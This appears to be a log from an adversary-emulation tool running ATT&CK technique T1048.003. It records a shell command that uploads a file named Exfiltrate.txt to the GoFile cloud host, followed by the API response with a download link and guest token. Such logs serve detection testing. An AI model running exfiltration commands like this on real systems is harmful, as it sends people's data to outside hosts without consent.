[+] Tactic ID   : T1048.003 -3
[+] Technique   : Exfiltration Over Alternative Protocol: Exfiltration to Cloud Storage (GoFile)
[+] Command     :
bash Dependencies/GoFile.sh
[+] Success
----- OUTPUT START -----
Response:
{
  "data": {
    "createTime": 1755001900,
    "downloadPage": "https://gofile.io/d/Rdx7nl",
    "guestToken": "TzY4tJcL3LT4N4b0oSrWRHWtXkGG28uJ",
    "id": "753f367e-7895-4205-8d43-d77c13752fb0",
    "md5": "556ec229f92612df412a6a998da60c1d",
    "mimetype": "text/plain; charset=utf-8",
    "modTime": 1755001900,
    "name": "Exfiltrate.txt",
    "parentFolder": "f857cfdb-a78c-49cb-9886-9d97328dbe6e",
    "parentFolderCode": "Rdx7nl",
    "servers": [
      "cold-na-phx-3"
    ],
    "size": 46,
    "type": "file"
  },
  "status": "ok"
}
[+] Download link: https://gofile.io/d/Rdx7nl
----- OUTPUT END -----
